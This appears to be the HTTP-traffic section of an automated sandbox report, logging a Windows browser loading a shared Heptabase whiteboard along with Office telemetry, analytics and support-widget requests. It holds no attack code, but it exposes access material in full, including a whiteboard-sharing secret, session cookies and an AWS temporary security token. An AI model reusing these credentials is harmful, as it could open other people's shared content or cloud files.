              Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
              Source: global trafficHTTP traffic detected: GET /v1/projects/DLoZj20J3fbiMh0k0lAp4MppFhSpND9Z/settings HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://app.heptabase.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/Inter-Medium-1b498b95.woff2?v=3.19 HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.heptabase.com/assets/index-18bd8637.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /api/6321418/envelope/?sentry_key=00289ace08a54d5fb367f421faa5b69f&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.92.0 HTTP/1.1Host: o1198943.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /v1/initialize?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837083421&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&se=1 HTTP/1.1Host: featureassets.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/GuestPage-ec7f959e.css HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /assets/Inter-Regular-d612f121.woff2?v=3.19 HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.heptabase.com/assets/index-18bd8637.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /assets/GuestPage-39686c92.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /assets/GuestError-26f258d6.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /v1/projects/DLoZj20J3fbiMh0k0lAp4MppFhSpND9Z/settings HTTP/1.1Host: cdn.segment.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/checkIsCommandPaletteInWhiteboardSearchShortcut-2af7b6d4.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /assets/index-06eeb664.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /assets/is-plan-event-enabled-e020507e.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /assets/helpers-28f3a226.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /v1/whiteboard-sharing/?secret=9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7 HTTP/1.1Host: api.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/plain, */*sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://app.heptabase.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /widget/nc7yq1pg HTTP/1.1Host: widget.intercom.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /assets/Inter-SemiBold-15226129.woff2?v=3.19 HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://app.heptabase.com/assets/index-18bd8637.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /v1/whiteboard-sharing/?secret=9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7 HTTP/1.1Host: api.heptabase.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com
              Source: global trafficHTTP traffic detected: GET /assets/index-e57bd1fd.js HTTP/1.1Host: app.heptabase.comConnection: keep-aliveOrigin: https://app.heptabase.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: app.heptabase.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7?id=c9bfc81f-fa96-4dff-99fa-279a46da3576Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104&lock=45ec7c01-12ed-45a7-8816-9649ba7e3c11If-None-Match: "40e25ea0cc3f01ac8f7ff21ba438321e"If-Modified-Since: Mon, 24 Mar 2025 14:10:13 GMT
              Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: app.heptabase.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104
              Source: global trafficHTTP traffic detected: GET /frame-modern.24099529.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /vendor-modern.c71ca7d4.js HTTP/1.1Host: js.intercomcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: app.heptabase.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: pscd=get.heptabase.com; _dd_s=logs=1&id=62d2ec3a-d523-4e25-8acf-7f23b17c7167&created=1742837083104&expire=1742837983104If-None-Match: "40e25ea0cc3f01ac8f7ff21ba438321e"If-Modified-Since: Mon, 24 Mar 2025 14:10:13 GMT
              Source: global trafficHTTP traffic detected: GET /next-integrations/actions/amplitude-plugins/5843404183e0e2708588.js HTTP/1.1Host: cdn.segment.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /7bc20933-395c-4bea-b8ef-657e689f4461/48bc7a27-a1fe-4a9f-9e5d-ce6f93a1c46e?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=ASIAWG7ACJC2SIPZZMG7%2F20250324%2Fus-west-1%2Fs3%2Faws4_request&X-Amz-Date=20250324T172449Z&X-Amz-Expires=604800&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEJf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLXdlc3QtMSJGMEQCIEO%2BbMaHNavUkZVL26kWD5F%2FBAJUS205oohrwUh5hVBMAiARmu6txal9o9uqt2N2n9NM9GzSpvHEq8dZbFXGNhcRjyryAwjw%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDQyNzI4MjI4Njc3MyIMdOcZLTQ0mY9%2BVGv3KsYD0L4%2FVEJbT1iSzVKAONiynZbz2Cx6ewv77y62wtPMnaUwpBurSmgHV%2BjnZ0nyOINxwqwahRGmqKTTfkezWF0jzaJt%2FIOU2cvuCsySsHTPKXFfl5ERR9MkNAbbQlNgLnAbAiXlfr84VmFVm6%2B444P6xKpBoxz3R93JpjULRsmldYny2EZ08QCp2k6cBvUsW%2F26GqFv9%2Fp0ZuQPn6hOmyUAp%2BovKAejmiAv1xQI9DQgqnoW8CYP6rvt2oljcE4jipfyWfW3ZcnNHBsAnOXcoUnbkhtGrCdUWTAFRecgGjsVIv8Mc%2FL9XzRxEUFbhj9I0joWoWPe7aWFl6Zh2Pk1xmY1Ax5dt8%2BRv23%2BfByZAAJef2Tiqx%2Fd8IkK25RIV0fkEa7YVRBbdz3fuYcrmvA0ki5yvAj94O2q31ngxNT37hYuXL3C38n4AYY1YCmiVTfA93hEEGUQ806qdV7FjjS%2FY1CPyBHMlJdrf9UzZCcORwNsFKR1ZjmsnXHu1KpbW3aiIZ7vJqzS13QboQDW9tsCyw2mrw5qscHHTs8ywY4ZILhQ4WxCSpjdGyFTDWlTN77V01fdSY2AxoCan8s29%2B%2BfzUNxdxBripdXEjDG1oW%2FBjqmAQyeVeGypuI4%2Feiw%2B05IS1YrRbpTydqenB0rYAaH6oeGSu%2FjoRjoxA51daygu2vsTsdzp2zctc8%2FobSZmO3FRUgXz3A0UvBxeXKxswy%2F0JR%2FaxaMBFKLhOsok21o7qJbaCuBUMf2xf4jW3F0OgvOeyFxqytKyTYFJsIqpU3m9Ny7S%2FDJT3p55JKEjkYzNAeMkIDFOoQ9WyfQgCrkQVsWAs2fh94nb%2Fo%3D&X-Amz-Signature=785b00f6cd64c6a3daa5743b936cff76b1875610fac000215493659f07e0d78d&X-Amz-SignedHeaders=host&response-content-type=image%2Fjpeg&x-id=GetObject HTTP/1.1Host: heptabase-hepta-file.s3.us-west-1.amazonaws.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://app.heptabase.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
